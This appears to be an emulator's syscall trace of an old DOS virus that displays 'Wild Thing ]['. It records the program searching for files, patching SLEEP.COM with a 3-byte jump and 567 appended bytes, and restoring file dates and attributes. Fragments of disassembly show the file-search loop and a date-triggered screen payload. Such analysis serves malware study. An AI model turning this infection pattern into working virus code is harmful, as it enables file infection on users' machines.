2018-12-25T12:42:10.593487342Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.595843165Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.59988721Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.602582105Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.625185635Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.626850779Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.635402614Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.647503194Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.650413917Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.65664898Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.668190731Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.675586494Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.677489001Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.685863525Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.687659792Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.690699303Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.693001896Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.703512368Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.705301043Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.713768412Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.725554138Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.728642612Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.735209658Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.747206584Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.754894564Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.756892577Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.765360031Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.768454973Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.771802975Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.774879335Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.784740658Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.786793403Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.795833939Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.808226091Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.811190556Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.817908675Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.829403054Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.837424369Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.839014412Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.84721628Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.849043181Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.852275548Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.85553831Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.865320207Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.867405206Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.876896289Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.888509309Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.891822029Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.899308054Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.911366363Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.919170401Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.921185048Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.931485519Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.933294899Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.936487763Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.939284265Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.950630746Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.952319037Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.961546308Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.974414989Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.977953456Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.984945289Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.996745536Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.00455201Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.007073478Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.016288891Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.018246999Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.021638718Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.024722076Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.034412002Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.036116937Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.04524164Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.056543444Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.059817899Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.067260631Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.078832348Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.092779247Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.094391292Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.103733039Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.105590754Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.113881218Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.127740835Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.130746682Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.135929132Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.138896252Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.140413237Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.347361211Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.350471314Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.353729362Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.35723816Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.369041371Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.371269244Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.373939126Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.390864555Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.392724508Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.39738219Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.40092298Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.404759175Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.407251826Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.410914404Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.41611608Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.420698551Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.431829532Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.436309552Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.438928758Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.457460806Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.4606108Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.461810484Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.462835788Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.464376223Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.46538057Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.466401978Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.471904122Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.473328124Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.474851715Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.476881129Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.483172446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.484450035Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.486607259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.487874125Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.489111643Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.492071589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.493265378Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.49451418Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.496327515Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.497447628Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.498746781Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.500403471Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.501647276Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.502913252Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.504857049Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.506040392Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.507171586Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.509025857Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.510129838Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.511414278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.513228541Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.514866264Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.51626979Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.518338165Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.51955342Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.52107704Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.523260393Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.525467484Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.530215661Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.532419199Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.534180346Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.535475367Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.539641749Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.540942752Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.544261066Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.545889603Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.547926815Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.55018627Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.55270542Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.554438313Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.559558757Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.562395329Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.564291645Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.565496061Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.567490168Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.568940146Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.570216284Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.571533126Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.578085862Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.58204918Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.583642214Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.585545268Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.604839824Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.605859389Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.607850527Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.611646268Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.613599227Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.615310817Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.617484278Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.619779479Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.624685671Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.627565048Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.633292536Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.641286258Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.645259082Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.646872727Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.649245199Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.650619757Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.653322495Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.655475835Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.656884667Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.658223317Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.660892133Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.663280599Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.665489213Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.674882395Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.677456367Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.678859858Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.681163841Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.683156868Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.684776703Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.687140588Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.68827247Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.690155577Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.422852831Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.424930305Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.428159754Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.43169302Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.434472977Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.442809999Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.44956751Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.456081445Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.477792717Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.491540415Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.497324958Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.505465785Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.507104396Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.510155307Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.514508225Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.523655251Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.525427033Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.534861194Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.54912493Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.552621996Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.559170945Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.570696599Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.578082143Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.579836546Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.587661446Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.589550602Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.592775266Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.595888067Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.60502527Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.606771513Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.616796385Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.628699207Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.632061607Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.639474821Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.650717381Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.658225513Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.660566503Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.667971461Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.669844296Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.673269814Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.676310076Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.685867601Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.688111494Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.69749901Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.708387532Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.711419033Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.718531056Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.729339607Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.736725988Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.739304721Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.746810625Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.74880789Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.752955523Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.75559318Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.765508182Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.767786233Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.777621958Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.78938134Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.792732339Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.800538097Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.820783118Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.828815244Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.831702625Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.839273872Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.840749329Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.844050219Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.845991092Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.854742746Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.866400773Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.875297486Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.8867869Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.88974323Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.896619931Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.907561433Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.915349669Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.918247384Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.925632096Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.927477188Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.931774322Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.937292365Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.943735038Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.946101275Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.952424569Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.959570244Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.96235914Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.96987083Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.988610868Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.99697094Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.999676174Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.00768065Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.010093712Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.014678568Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.017018589Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.026980324Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.029635016Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.038939716Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.050310808Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.054551632Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.061739715Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.072961202Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.086913487Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.089996524Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.097525855Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.099690483Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.109105032Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.122120492Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.125252984Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.131602328Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.133818522Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.135267266Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.34060811Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.343155182Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.345992006Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.349870596Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.363077836Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.365162906Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.367936255Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.387672513Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.38952516Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.394893033Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.39954399Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.40293222Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.405541923Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.414328926Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.417485971Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.421282876Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.43170388Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.433090514Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.434659094Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.461402751Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.467530135Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.469086716Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.471842655Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.47465358Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.47682889Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.47875415Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.49323682Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.495566947Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.498618738Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.500457168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.502010848Z 62 PC: 8f8f2 | Close file (See above)
